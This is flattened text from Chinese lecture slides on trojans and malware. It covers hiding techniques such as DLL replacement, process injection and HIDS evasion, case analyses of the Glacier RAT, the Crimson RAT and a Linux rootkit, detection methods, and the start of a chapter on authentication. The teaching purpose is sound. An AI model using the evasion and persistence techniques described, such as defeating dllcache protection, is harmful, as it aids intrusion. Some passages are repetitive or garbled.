?yàn)榱诉_(dá)到控制目標(biāo)主機(jī)的目的，通常想知道目標(biāo)主機(jī)用戶目前在干什么，于是記錄用戶事件成了木馬的又一主要功能。其一是記錄被控端計(jì)算機(jī)的鍵盤和鼠標(biāo)事件，形成一個(gè)文本文件，然后把該文件發(fā)送到控制端，控制端用戶通過查看文件的方式了解被控端用戶打開了哪些程序，敲了那些鍵；其二是在被控端抓取當(dāng)前屏幕，形成一個(gè)位圖文件，然后把該文件發(fā)送到控制端顯示，從而通過抓取得屏幕知道目標(biāo)用戶的操作行為。(3)遠(yuǎn)程操作遠(yuǎn)程操作重啟被控制端計(jì)算機(jī)，或者強(qiáng)制關(guān)閉遠(yuǎn)程計(jì)算機(jī)，當(dāng)被控制計(jì)算機(jī)重新啟動(dòng)時(shí)，木馬程序重新獲得控制權(quán)。木馬使用者通過網(wǎng)絡(luò)控制被控端計(jì)算機(jī)的鼠標(biāo)和鍵盤，也可以通過這種方式啟動(dòng)或停止被控端的應(yīng)用程序。對(duì)遠(yuǎn)程的文件進(jìn)行管理，比如共享被控端的硬盤，之后就可以進(jìn)行任意的文件操作。內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼1惡意代碼檢測(cè)與防御木馬的隱藏技術(shù)木馬的隱藏技術(shù)：?jiǎn)?dòng)隱藏木馬文件/目錄隱藏進(jìn)程隱藏通信隱藏隱藏自己，使得目標(biāo)主機(jī)加載運(yùn)行木馬程序，而不被用戶發(fā)現(xiàn)前面介紹的各種木馬自動(dòng)加載技術(shù)前面介紹的無文件木馬，通過其它軟件來觸發(fā)執(zhí)行誘騙用戶點(diǎn)擊運(yùn)行：如文件類型圖標(biāo)欺騙1、啟動(dòng)隱藏用文檔類（doc/docx/txt/jpg等）圖標(biāo)來隱藏可執(zhí)行文件（exe）來欺騙受害者點(diǎn)擊文件類型圖標(biāo)誘騙VisualStudio2013：用C#編寫軟件時(shí)指定EXE文件的自定義圖標(biāo)文件類型圖標(biāo)誘騙Python：指定exe的自定義軟件圖標(biāo)文件類型圖標(biāo)誘騙通過某種方式使用戶無法發(fā)現(xiàn)木馬文件和目錄隱藏在其它文件中：如無文件木馬勾選文件/目錄屬性中的“隱藏”，文件瀏覽器不可見（除非開啟顯示所有文件）2、木馬文件/目標(biāo)隱藏3、進(jìn)程隱藏隱藏木馬進(jìn)程，使得任務(wù)管理器等工具不可見.偽隱藏是指程序的進(jìn)程仍然存在，只不過是讓它消失在進(jìn)程列表里。真隱藏則是讓程序徹底的消失，不以一個(gè)進(jìn)程或者服務(wù)的方式工作。3、進(jìn)程隱藏設(shè)置窗口不可見

(從任務(wù)欄中隱藏)把木馬程序注冊(cè)為服務(wù)

(從進(jìn)程列表中隱藏)欺騙查看進(jìn)程的函數(shù)

(從進(jìn)程列表中隱藏)使用可變的高端口

(端口隱藏技術(shù))使用系統(tǒng)服務(wù)端口

(端口隱藏技術(shù))替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL (真隱藏技術(shù))動(dòng)態(tài)嵌入技術(shù)(真隱藏技術(shù))（1）設(shè)置窗口不可見這是最基本的隱藏方式。如果在Windows的任務(wù)欄里出現(xiàn)一個(gè)莫名其妙的圖標(biāo)，傻子都會(huì)明白是怎么回事。實(shí)現(xiàn)任務(wù)欄中隱藏，在編程時(shí)是很容易實(shí)現(xiàn)的。以VB為例，只要把form的Visible屬性設(shè)置為False，ShowInTaskBar設(shè)為False，程序就不會(huì)出現(xiàn)在任務(wù)欄里了。（2）把木馬程序注冊(cè)為服務(wù)進(jìn)程列表中不顯示木馬進(jìn)程:在Windows

9X/NT/2000/xp/2003下，把木馬服務(wù)端程序注冊(cè)為一個(gè)服務(wù)就可以了，這樣，程序就會(huì)從任務(wù)列表中消失了，因?yàn)橄到y(tǒng)不認(rèn)為它是一個(gè)進(jìn)程，在任務(wù)管理器中就看不到這個(gè)程序的進(jìn)程。這種方法對(duì)于WindowsNT/2000/xp/2003等操作系統(tǒng)來說，通過服務(wù)管理器，同樣會(huì)發(fā)現(xiàn)在系統(tǒng)中注冊(cè)過的服務(wù)。（3）欺騙查看進(jìn)程的函數(shù)Windows系統(tǒng)中，一般是通過API調(diào)用來查看運(yùn)行的進(jìn)程，常用的API包括PSAPI，PDH，ToolHelpAPI等。進(jìn)程查看軟件API調(diào)用結(jié)果返回替換API調(diào)用返回的數(shù)據(jù)，保護(hù)木馬進(jìn)程不被發(fā)現(xiàn)。（4）替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLLDLL(DynamicLinkLibrary，動(dòng)態(tài)鏈接庫)是Windows系統(tǒng)的一種可執(zhí)行文件。DLL文件沒有程序邏輯，是由多個(gè)功能函數(shù)構(gòu)成的，它并不能獨(dú)立運(yùn)行，需要由程序加載并調(diào)用。正因?yàn)镈LL文件不能獨(dú)立運(yùn)行，所以在進(jìn)程列表中并不會(huì)出現(xiàn)DLL。運(yùn)行DLL文件的最簡(jiǎn)單方法是Rundll32.exe例如我們編寫了一個(gè)MyDll.dll，這個(gè)動(dòng)態(tài)鏈接庫中定義了一個(gè)MyFunc的函數(shù)，可以通過命令執(zhí)行MyFunc函數(shù)的功能:Rundll32MyDll.dllMyFunc（4）替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL攻擊者使用自己的DLL文件替換掉Windows系統(tǒng)中正常的DLL文件。這種方法利用了Windows系統(tǒng)的驅(qū)動(dòng)或DLL，既可以啟動(dòng)木馬，也可以隱藏木馬。不使用進(jìn)程，屬于真隱藏技術(shù)。DLL木馬通過別的進(jìn)程來運(yùn)行它，如果這個(gè)進(jìn)程是可信進(jìn)程，就沒有人會(huì)懷疑它是木馬，那么這個(gè)DLL木馬作為可信進(jìn)程的一部分，就成為了被信賴的一部分而為所欲為（4）替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL這種方法與一般方法不同，它基本上擺脫了原有的木馬模式---監(jiān)聽端口，而采用替代系統(tǒng)功能的方法（改寫虛擬設(shè)備驅(qū)動(dòng)程序vxd或動(dòng)態(tài)鏈接庫DLL文件），木馬會(huì)將修改后的DLL替換系統(tǒng)已知的DLL，并對(duì)所有的函數(shù)調(diào)用進(jìn)行過濾。（4）替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL攻擊者的DLL文件一般包括有函數(shù)轉(zhuǎn)發(fā)器。在處理函數(shù)調(diào)用時(shí)，對(duì)于系統(tǒng)正常的調(diào)用請(qǐng)求，它就把請(qǐng)求直接轉(zhuǎn)發(fā)給被替換的系統(tǒng)DLL進(jìn)行處理；如果是約定的相應(yīng)操作(事先約定好的特殊情況)，則按照約定完成所請(qǐng)求的功能。這樣做的好處是沒有增加新的文件，不需要打開新的端口，沒有新的進(jìn)程，使用常規(guī)的方法監(jiān)測(cè)不到它。（4）替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL注意：現(xiàn)在Windows對(duì)重要的DLL有保護(hù)機(jī)制Windowssystem32目錄下有一個(gè)dllcache的目錄，下面存放著大量DLL文件和重要的.exe文件，Windows系統(tǒng)一旦發(fā)現(xiàn)被保護(hù)的DLL文件被改動(dòng)，它就會(huì)自動(dòng)從dllcache中恢復(fù)這個(gè)文件。所以在替換系統(tǒng)DLL文件之前必須先把dllcache目錄下的對(duì)應(yīng)的系統(tǒng)DLL文件也替換掉。系統(tǒng)重裝、安裝補(bǔ)丁、升級(jí)系統(tǒng)或者檢查數(shù)字簽名等均會(huì)使這種木馬種植方法失效。（5）動(dòng)態(tài)嵌入技術(shù)另一種利用DLL隱藏木馬的方法是動(dòng)態(tài)嵌入技術(shù)：將木馬程序代碼嵌入到正在運(yùn)行的進(jìn)程中Windows系統(tǒng)中的每個(gè)進(jìn)程都有自己的私有內(nèi)存空間，一般不允許別的進(jìn)程對(duì)其進(jìn)行操作。但可以通過窗口hook（鉤子函數(shù)）、掛接API、遠(yuǎn)程線程(CreateRemoteThread)等方法進(jìn)入并操作進(jìn)程的私有空間，使木馬的核心代碼運(yùn)行于其它進(jìn)程的內(nèi)存空間。這種方法比DLL替換技術(shù)有更好的隱藏性。（6）進(jìn)程隱藏小結(jié)4、通信隱藏端口隱藏：現(xiàn)在大部分木馬一般在控制主機(jī)后會(huì)在1024以上不易發(fā)現(xiàn)的高端口上駐留；有一些木馬也會(huì)選擇一些常用的端口，如80、23。有些木馬利用80端口時(shí)，在收到正常的HTTP請(qǐng)求仍然把它交與Web服務(wù)器處理，只有收到一些特殊約定的數(shù)據(jù)包后，才調(diào)用木馬程序。端口復(fù)用是重復(fù)使用系統(tǒng)中已經(jīng)開啟的端口，從而繞過防火墻的攔截。4、通信隱藏端口監(jiān)聽的缺點(diǎn)：木馬在等待和運(yùn)行的過程中，始終向外界打開著一個(gè)端口，容易暴露。不使用端口：利用非TCP/UDP協(xié)議，如ICMP協(xié)議。在沒有激活時(shí)是沒有端口開放的，ICMP木馬監(jiān)聽ICMP報(bào)文，當(dāng)出現(xiàn)特殊報(bào)文時(shí)，它打開TCP端口等待控制端的連接。4、通信隱藏：非端口木馬一定要直接與其控制者通信嗎？通過中間方交換信息電子郵件網(wǎng)盤網(wǎng)頁4、通信隱藏案例：灰鴿子木馬技術(shù)小結(jié)近年來，木馬技術(shù)取得了較大的發(fā)展，目前已徹底擺脫了傳統(tǒng)模式下植入方法原始、通信方式單一、隱蔽性差等不足。借助一些新技術(shù)，木馬不再依賴于對(duì)用戶進(jìn)行簡(jiǎn)單的欺騙，也可以不必修改系統(tǒng)注冊(cè)表，不開新端口，不在磁盤上保留新文件，甚至可以沒有獨(dú)立的進(jìn)程，這些新特點(diǎn)使對(duì)木馬的查殺變得愈加困難，與此同時(shí)卻使得木馬的功能得到了大幅提升。內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼1惡意代碼檢測(cè)及防御靜態(tài)檢測(cè)（特征檢測(cè)）：根據(jù)惡意代碼的特征碼（代碼散列碼、代碼中的關(guān)鍵字、字節(jié)串、特定端口等）進(jìn)行檢測(cè)動(dòng)態(tài)檢測(cè)：根據(jù)惡意代碼執(zhí)行后的異常行為進(jìn)行檢測(cè)惡意代碼檢測(cè)惡意代碼檢測(cè)：特征檢測(cè)惡意代碼檢測(cè)：特征檢測(cè)惡意代碼檢測(cè)：特征檢測(cè)惡意代碼檢測(cè)：特征檢測(cè)惡意代碼檢測(cè)：特征檢測(cè)將惡意代碼中的某段特有的十六進(jìn)制字節(jié)碼或字符串（如某個(gè)特定的域名或IP地址）作為特征碼，如Monkey病毒代碼中的十六進(jìn)制字節(jié)碼“8BFB%%B90002%%268A0534??AAE2F8”惡意代碼檢測(cè)：特征檢測(cè)特征碼檢測(cè)技術(shù)的主要優(yōu)點(diǎn)是簡(jiǎn)單、檢測(cè)速度快、準(zhǔn)確率高，不足：不能檢測(cè)未知惡意軟件，對(duì)于惡意代碼變體的容忍度也很低，稍微變形便無法識(shí)別；用戶需要不斷地升級(jí)（離線或在線）殺毒軟件特征庫，同時(shí)隨著特征庫越來越大，檢測(cè)的效率會(huì)越來越低。惡意代碼檢測(cè)：特征檢測(cè)動(dòng)態(tài)檢測(cè)技術(shù)基于定義的惡意代碼異常行為規(guī)則，實(shí)時(shí)監(jiān)控進(jìn)程的動(dòng)態(tài)行為，當(dāng)發(fā)現(xiàn)有違犯規(guī)則的行為出現(xiàn)，則給出異常告警。這些行為主要包括：文件行為進(jìn)程行為網(wǎng)絡(luò)行為注冊(cè)表行為惡意代碼檢測(cè)：動(dòng)態(tài)檢測(cè)與特征碼靜態(tài)檢測(cè)技術(shù)相比，動(dòng)態(tài)檢測(cè)技術(shù)能夠檢測(cè)未知惡意代碼、惡意代碼的變種，不足：產(chǎn)生的誤報(bào)率較高，且不能識(shí)別出病毒的名稱和類型等。惡意代碼檢測(cè)：動(dòng)態(tài)檢測(cè)沙箱檢測(cè)：在沙箱（Sandbox）中運(yùn)行木馬，觀察其行為，應(yīng)對(duì)加殼、多態(tài)、功能代碼動(dòng)態(tài)生成、隱蔽通信等各種逃避檢測(cè)的技術(shù)惡意代碼檢測(cè)：動(dòng)態(tài)檢測(cè)沙箱檢測(cè)：惡意代碼檢測(cè)：動(dòng)態(tài)檢測(cè)機(jī)器學(xué)習(xí)：應(yīng)對(duì)海量惡意代碼的檢測(cè)惡意代碼檢測(cè)：機(jī)器學(xué)習(xí)方法常見的用于惡意代碼檢測(cè)的機(jī)器學(xué)習(xí)算法有：普通機(jī)器學(xué)習(xí)方法，如支持向量機(jī)（SVM）、隨機(jī)森林（RF）、樸素貝葉斯（NB）等深度機(jī)器學(xué)習(xí)算法，如深度神經(jīng)網(wǎng)絡(luò)（DNN）、卷積神經(jīng)網(wǎng)絡(luò)（CNN）、長短時(shí)記憶網(wǎng)絡(luò),LSTMN）、圖卷積網(wǎng)絡(luò)（GCN）等惡意代碼檢測(cè)：機(jī)器學(xué)習(xí)方法Kaspersky：用機(jī)器學(xué)習(xí)方法檢測(cè)惡意樣本惡意代碼檢測(cè)：機(jī)器學(xué)習(xí)方法Kaspersky：精簡(jiǎn)機(jī)器學(xué)習(xí)檢測(cè)模型惡意代碼檢測(cè)：機(jī)器學(xué)習(xí)方法優(yōu)勢(shì)在大規(guī)模樣本檢測(cè)能力，不足：檢測(cè)的準(zhǔn)確率還有待提高、對(duì)計(jì)算能力的要求比較高、有監(jiān)督機(jī)器學(xué)習(xí)方法中的樣本標(biāo)注問題等，同時(shí)近幾年越來越多的對(duì)機(jī)器學(xué)習(xí)算法進(jìn)行攻擊的研究，如對(duì)抗樣本，表明少量精心設(shè)計(jì)的樣本即可導(dǎo)致機(jī)器學(xué)習(xí)檢測(cè)算法出錯(cuò)。惡意代碼檢測(cè)：機(jī)器學(xué)習(xí)方法惡意代碼防范雖然惡意代碼隱蔽性強(qiáng)，種類多，攻擊者也設(shè)法采用各種隱藏技術(shù)來增加被用戶檢測(cè)到的難度，但由于惡意代碼實(shí)質(zhì)上是一個(gè)程序，必須運(yùn)行后才能工作，所以會(huì)在計(jì)算機(jī)的文件系統(tǒng)、系統(tǒng)進(jìn)程表、注冊(cè)表、系統(tǒng)文件和日志等中留下蛛絲馬跡，用戶可以通過“查、堵、殺”等方法檢測(cè)和清除惡意代碼。惡意代碼防范常用的防范惡意代碼措施：及時(shí)修補(bǔ)漏洞，安裝補(bǔ)丁培養(yǎng)風(fēng)險(xiǎn)意識(shí)，不使用來歷不明的軟件不打開可疑短信、郵件及其附件安裝殺毒軟件且不關(guān)閉查殺功能，即時(shí)發(fā)現(xiàn)，即時(shí)清除移動(dòng)存儲(chǔ)設(shè)備：用前查殺關(guān)閉不必要的網(wǎng)絡(luò)端口和服務(wù)Webshell防范惡意代碼防范

本章小結(jié)討論更新：將源目錄下的所有文件（含子目錄）拷貝到目的目錄下問題一：360認(rèn)為其是勒索病毒的可能原因是什么？問題二：360采用的是特征檢測(cè)還是異常檢測(cè)方法？作業(yè)冰河CrimsonAPT木馬實(shí)例參考資料一、木馬實(shí)例（冰河）冰河冰河開發(fā)于1999年，跟灰鴿子類似，在2005年中美黑客大戰(zhàn)中為中國黑客增了不少面子。作者：黃鑫（glacier，西安電子科大，2000底加盟安全焦點(diǎn)，開發(fā)了Xscan）包括兩個(gè)可運(yùn)行的程序G_Server和G_Client，其中前者是木馬的服務(wù)器端，就是用來植入目標(biāo)主機(jī)的程序，后者是木馬的客戶端，也就是木馬的控制臺(tái)。冰河客戶端界面冰河的主要功能自動(dòng)跟蹤目標(biāo)機(jī)屏幕變化(局域網(wǎng)適用)完全模擬鍵盤及鼠標(biāo)輸入(局域網(wǎng)適用)記錄各種口令信息獲取系統(tǒng)信息限制系統(tǒng)功能遠(yuǎn)程文件操作注冊(cè)表操作發(fā)送信息點(diǎn)對(duì)點(diǎn)通訊冰河的使用—連接服務(wù)器服務(wù)器端運(yùn)行后，可以在控制臺(tái)上進(jìn)行連接。單擊工具欄上的快捷按鈕“添加主機(jī)”，彈出如圖所示的對(duì)話框，輸入遠(yuǎn)程主機(jī)的相關(guān)信息即可。冰河的使用—連接成功后的信息

連接成功后，則會(huì)顯示遠(yuǎn)程主機(jī)上的信息如硬盤盤符等，如圖所示。冰河的使用—搜索服務(wù)器以上直接連接是一種方法，冰河還可以自動(dòng)搜索已經(jīng)中了冰河木馬的主機(jī)，只需要簡(jiǎn)單的設(shè)置即可。搜索服務(wù)器搜索到9冰河的使用(續(xù))在9中安裝了木馬服務(wù)器后，就可對(duì)這臺(tái)計(jì)算機(jī)進(jìn)行操作了。冰河的功能非常強(qiáng)大，它有“文件管理器”和“命令控制臺(tái)”兩個(gè)選項(xiàng)卡。點(diǎn)擊“文件管理器”可以管理被入侵的電腦的硬盤。文件管理器文件管理器—下載文件冰河的使用(續(xù))單擊“命令控制臺(tái)標(biāo)簽”，可以看到這里有眾多的功能。冰河的命令控制臺(tái)獲得系統(tǒng)信息和口令捕獲對(duì)方屏幕向?qū)Ψ桨l(fā)送信息管理對(duì)方的進(jìn)程2025/1/14網(wǎng)絡(luò)入侵與防范講義173控制對(duì)方系統(tǒng)2025/1/14網(wǎng)絡(luò)入侵與防范講義174注冊(cè)表管理甚至可以對(duì)桌面等其它信息設(shè)置冰河的使用(總結(jié))冰河幾乎可以對(duì)入侵的計(jì)算機(jī)進(jìn)行完全的控制，完全可以當(dāng)作一個(gè)遠(yuǎn)程管理工具使用。二、木馬實(shí)例（Crimson）一個(gè)簡(jiǎn)單的遠(yuǎn)程控制型木馬（Crimson）分析（/2020/07/24/crimson-rat-malware-analysis/）拓展IamusingOLEToolstogetthepropertyofexcelfile:cmd>olemeta.py<filename>Crimson分析NextOLEToolcommandIamrunningistogettheOLEdetails:cmd>olevba.py-a<filename>Crimson分析SuspiciousIndicators:VBAcodewillautoexecuteonopeningexcelworkbook.Createdirectoryonthesystem.Writeafileonthesystem.Executeshellcommand.hexstringusedforobfuscation.Crimson分析Now,IamextractingVBAfromexcelfileanddumpingittotxtfile.ForthatcommandIamrunningis:cmd>olevba.py–deofb<filename>>Path\output.exeFromtheVBAcode,IcanseethesubroutinecreatesafolderanddropexecutablefileatlocationC:\ProgramData\Rlmdias\Rlmdias.exeCrimson分析IopenedexcelandnavigatetoVBAProjectbyclickingAlt+F11.Porjectwaspasswordprotect.IremovedpasswordusingGitHubcodeandcheckoutmypreviousbloghowitcanbedone.Postpasswordremoval,IcanseethereisauserForm1whichhastwotextboxandhasahexvalueswhicharePEfileswilldroppeddependsontheOSversionofthevictim32bitor64bitCrimson分析IdebuggedtheVBAcodeanditdroppedazipfileatlocation“C:\ProgramData\Rlmdias\drngervia.zip”andunzipitusingfunctionunSadozipCrimson分析Droppedzipfilehasdrngervia.exefile.andShellcommandexecutetheexecutablefileCrimson分析whenShellexecuted,itopensWindowsfeaturesandasktodownloadandInstall.NetFramework3.5Crimson分析Crimson分析IhaveuseddnSpytodebugthePEfile.Lookingatthecode,itcreatespersistencecreatingaregistryentryCrimson分析ItgetsthelistofrunningprocessonthesystemCrimson分析Itlooksforantivirussoftwarerunningonthesystem.Itsearchesfortheantivirussoftwarefromthebelowlist.Crimson分析Crimson分析IhavealsofoundthehardcodedIPaddress,username.Malwareneverhittothisip[124.115.201.118]Crimson分析Crimson分析以CobalStrike為例遠(yuǎn)程控制過程中的幾個(gè)名詞三、一個(gè)APT木馬技術(shù)分析木馬文件實(shí)例分析木馬從植入到運(yùn)行，包括后續(xù)可能的滲透活動(dòng)都采用了各種技術(shù)進(jìn)行隱藏，很難發(fā)現(xiàn)。同時(shí)，該木馬也做了很多對(duì)抗，常規(guī)的安全監(jiān)測(cè)能力未必可以發(fā)現(xiàn)。其工作流程如圖所示。實(shí)例分析rootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作1.

rmgr.korootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作1.

rmgr.korootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作1.

rmgr.korootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作

1.rmgr.korootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作

1.rmgr.korootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作

1.rmgr.korootkit采用常見的LKM內(nèi)核模塊，加載后的主要操作

1.rmgr.ko此共享庫文件，由內(nèi)核rootkit釋放寫入磁盤，路徑為/tmp/.tmp_{21個(gè)隨機(jī)字母數(shù)字}，用于木馬的用戶態(tài)進(jìn)程的行為隱藏2.

rmgr__fake_libc.sosubhook前綴的函數(shù)摘抄自開源代碼（/Zeex/subhook/blob/master/subhook_x86.c）

2.rmgr__fake_libc.sofake前綴的函數(shù)主要用于對(duì)抗常見HIDS的進(jìn)程和命令記錄，fork和execve直接通過syscall調(diào)用，而不使用glibc的封裝，避開了hookglibc方式的HIDS。

2.rmgr__fake_libc.sofake_bash_add_history則讓bash命令審計(jì)功能失效。

2.rmgr__fake_libc.so此進(jìn)程由rmgr.ko釋放寫入磁盤，路徑為/tmp/.tmp_{21個(gè)隨機(jī)字母數(shù)字}。由C++開發(fā)，編譯后upx加殼壓縮，直接用開源軟件upx-drmgr_daemon即可脫殼，并無特殊處理。3.rmgr_daemon1)監(jiān)控內(nèi)核模塊狀態(tài)，與內(nèi)核rootkit信息交互3.rmgr_daemon2)更新3.rmgr_daemon3)生成rmgr_fake_sshd，并patchELF，修改依賴的動(dòng)態(tài)庫，也就是加入rmgr_fake_libc.so3.rmgr_daemon4)連接C25)管理rmgr_fake_sshd3.rmgr_daemon文件由rmgrdaemon寫入磁盤，路徑為/tmp/.tmp{21個(gè)隨機(jī)字母數(shù)字}，它的運(yùn)行均由rmgr_daemon管理4.rmgr_fake_sshd作為后門它硬編碼了PRIVATEKEY，因?yàn)橥ㄟ^patchELFhook了部分函數(shù)，實(shí)現(xiàn)了ssh登錄之后的命令執(zhí)行等行為的隱匿。而rmgr_fake_sshd本身，以及ssh登錄派生的子進(jìn)程均通過rmgr.ko根據(jù)前述分析通過patch內(nèi)核調(diào)用實(shí)現(xiàn)隱匿。監(jiān)聽在本地的26657端口，rmgr_daemon連接此端口轉(zhuǎn)發(fā)來至C2的ssh指令。這里實(shí)現(xiàn)了擬合業(yè)務(wù)環(huán)境常用網(wǎng)絡(luò)協(xié)議，使得常規(guī)的NIDS的檢測(cè)邏輯被繞過。4.rmgr_fake_sshd實(shí)例隱蔽技術(shù)小結(jié)四、“雛鶯行動(dòng)”分析雛鶯行動(dòng)雛鶯行動(dòng)攻擊流程雛鶯行動(dòng)文檔內(nèi)容雛鶯行動(dòng)部分宏代碼內(nèi)容雛鶯行動(dòng)excel.txt的內(nèi)容中包含了很多俄羅斯著名運(yùn)動(dòng)員的信息作為混淆，并在末尾處夾雜了一段PowerShell代碼，其功能為下載“pow.ps1”、“pork.txt”等后續(xù)載荷并執(zhí)行。雛鶯行動(dòng)pow.ps1腳本中包含一個(gè)名為$load_string的變量，該變量使用Base64進(jìn)行編碼，解碼后是一個(gè).NET可執(zhí)行程序，經(jīng)過分析為開源竊密程序修改而成雛鶯行動(dòng)pork.txt中功能主要為下載pay.txt腳本，并使用FromBase64String解碼該腳本。解碼后的pay.txt，其中$var_code變量依舊是一段Base64編碼的字符串，并且該變量是經(jīng)過異或加密的，解密密鑰為十進(jìn)制的35雛鶯行動(dòng)解碼異或$var_code變量，最后是一段ShellCode代碼，可以看到LoadLibraryA、VirtualAlloc等函數(shù)雛鶯行動(dòng)反分析方法雛鶯行動(dòng)受害者身份校驗(yàn)部分會(huì)通過訪問/xml獲取IP地址信息，檢測(cè)受害者所在國家是否為烏克蘭雛鶯行動(dòng)如果樣本通過反分析測(cè)試，首先根據(jù)PowerShell下發(fā)的user參數(shù)發(fā)送Telegrambot消息，告知攻擊者已經(jīng)啟動(dòng)雛鶯行動(dòng)搜集瀏覽器信息雛鶯行動(dòng)ShellCode分析雛鶯行動(dòng)IoCs雛鶯行動(dòng)本PPT是機(jī)械工業(yè)出版社出版的教材《網(wǎng)絡(luò)攻防原理與技術(shù)（第3版）》配套教學(xué)PPT（部分內(nèi)容的深度和廣度比教材有所擴(kuò)展），作者：吳禮發(fā)，洪征，李華波本PPT可能會(huì)直接或間接采用了網(wǎng)上資源或公開學(xué)術(shù)報(bào)告中的部分PPT頁面、圖片、文字，引用時(shí)我們力求在該P(yáng)PT的備注欄或標(biāo)題欄中注明出處，如果有疏漏之處，敬請(qǐng)諒解。同時(shí)對(duì)被引用資源或報(bào)告的作者表示誠摯的謝意！本PPT可免費(fèi)使用、修改，使用時(shí)請(qǐng)保留此頁。聲明第八章身份認(rèn)證與口令攻擊內(nèi)容提綱身份認(rèn)證1口令行為規(guī)律和口令猜測(cè)2口令破解3口令防御4身份認(rèn)證一個(gè)系統(tǒng)的安全性常常依賴于對(duì)終端用戶身份的正確識(shí)別與檢查。對(duì)計(jì)算機(jī)系統(tǒng)的訪問必須根據(jù)訪問者的身份施加一定的限制，這些是最基本的安全問題。身份認(rèn)證一般涉及兩方面的內(nèi)容：識(shí)別和驗(yàn)證。識(shí)別：識(shí)別是指要明確訪問者是誰，即必須對(duì)系統(tǒng)中的每個(gè)合法用戶都有識(shí)別能力。要保證識(shí)別的有效性，必須保證任意兩個(gè)不同的用戶都不能具有相同的識(shí)別符。驗(yàn)證：驗(yàn)證是指在訪問者聲稱自己的身份后(向系統(tǒng)輸入它的識(shí)別符)，系統(tǒng)還必須對(duì)它所聲稱的身份進(jìn)行驗(yàn)證，以防假冒。身份認(rèn)證個(gè)人身份驗(yàn)證方法可以分成四種類型：所知：驗(yàn)證他知道什么，如密碼、口令所有：驗(yàn)證他擁有什么，如身份證、護(hù)照、信用卡、智能門卡所在：驗(yàn)證他在什么位置，如IP、辦公室地址用戶特征：驗(yàn)證他的生物特征（如指紋、虹膜、DNA等）、行為特征（如擊鍵、筆跡）五種方式：口令認(rèn)證信物認(rèn)證地址認(rèn)證用戶特征認(rèn)證密碼學(xué)認(rèn)證身份認(rèn)證汪定2015：口令認(rèn)證汪定2015：口令認(rèn)證汪定2015：口令認(rèn)證汪定2015：口令認(rèn)證汪定2015：口令認(rèn)證一、口令認(rèn)證用戶在注冊(cè)階段生成用戶名和初始口令，系統(tǒng)在其用戶文件或數(shù)據(jù)庫中保存用戶的信息（用戶名和口令）。當(dāng)用戶登錄認(rèn)證時(shí)，將自己的用戶名和口令上傳給服務(wù)器，服務(wù)器通過查詢其保存的用戶信息來驗(yàn)證用戶上傳的認(rèn)證信息是否和保存的用戶信息相匹配。如果匹配則認(rèn)為用戶是合法用戶，否則拒絕服務(wù)，并將認(rèn)證結(jié)果回傳給客戶端。用戶定期改變口令，以保證安全性。這種口令因其實(shí)現(xiàn)簡(jiǎn)單、使用方便，得到了廣泛的應(yīng)用。靜態(tài)口令動(dòng)態(tài)口令也稱為一次性口令，其基本原理：在用戶登錄過程中，基于用戶口令加入不確定因子，對(duì)用戶口令和不確定因子進(jìn)行單向散列函數(shù)變換，所得的結(jié)果作為認(rèn)證數(shù)據(jù)提交給認(rèn)證服務(wù)器。認(rèn)證服務(wù)器接收到用戶的認(rèn)證數(shù)據(jù)后，把用戶的認(rèn)證數(shù)據(jù)和自己用同樣的散列算法計(jì)算出的數(shù)值進(jìn)行比對(duì)，從而實(shí)現(xiàn)對(duì)用戶身份的認(rèn)證。動(dòng)態(tài)口令按生成原理可分為非同步和同步兩種認(rèn)證技術(shù)。非同步認(rèn)證技術(shù)生成的動(dòng)態(tài)口令主要是依據(jù)挑戰(zhàn)－響應(yīng)原理來實(shí)現(xiàn)。同步認(rèn)證技術(shù)包括與時(shí)間有關(guān)的時(shí)鐘同步認(rèn)證技術(shù)和與時(shí)間無關(guān)的事件同步認(rèn)證技術(shù)。動(dòng)態(tài)口令分類動(dòng)態(tài)口令認(rèn)證過程挑戰(zhàn)—響應(yīng)機(jī)制圖形口令圖形口令圖形口令二、密碼學(xué)認(rèn)證常用的密碼學(xué)認(rèn)證協(xié)議有一次性口令認(rèn)證、基于共享密鑰的認(rèn)證、基于公鑰證書的認(rèn)證、零知識(shí)證明和標(biāo)識(shí)認(rèn)證等密碼學(xué)認(rèn)證（一）一次性口令認(rèn)證一次性口令（One-TimePassword,OTP），一般使用雙運(yùn)算因子來實(shí)現(xiàn)固定因子，即用戶的口令或口令散列值動(dòng)態(tài)因子，每次不一樣的因子，如時(shí)間，事件序列，挑戰(zhàn)/應(yīng)答（challenge/response）。每種各有優(yōu)缺點(diǎn)一次性口令認(rèn)證動(dòng)態(tài)口令認(rèn)證過程挑戰(zhàn)—響應(yīng)機(jī)制一次性口令認(rèn)證協(xié)議S/KEY：1991年貝爾通信研究中心研制S/KEY迭代值(IC)

種子(seed)

秘密口令散列函數(shù)f

64位OTP6個(gè)單詞（每個(gè)11位）2位檢驗(yàn)和編碼基本原理S/KEY中，服務(wù)器產(chǎn)生挑戰(zhàn)（challenge）信息。挑戰(zhàn)信息由迭代值（IterationCount,IC）和種子（seed）組成。迭代值，指定散列計(jì)算的迭代次數(shù)，為1~100之間的數(shù)，每執(zhí)行一次挑戰(zhàn)/響應(yīng)過程，IC減1（當(dāng)IC為1時(shí)，則必須重新進(jìn)行初始化）。種子由兩個(gè)字母和5個(gè)數(shù)字組成。例如，挑戰(zhàn)信息“05xa13783”表示迭代值為05，種子為“xa13783”?？蛻舳耸盏教魬?zhàn)后，要將秘密口令與種子“xa13783”拼接后，做5次散列運(yùn)算。S/KEY基本原理S/KEY中支持三種散列函數(shù)，即MD4,MD5和SHA。OTP服務(wù)器將散列函數(shù)的固定輸出折疊成64位（OTP的長度）。64位OTP可以被轉(zhuǎn)換為一個(gè)由6個(gè)英文單詞組成的短語，每個(gè)單詞由1~4個(gè)字母組成，被編碼成11位，6個(gè)單詞共66位，其中最后2位（11*6-64=2）用于存儲(chǔ)校驗(yàn)和。S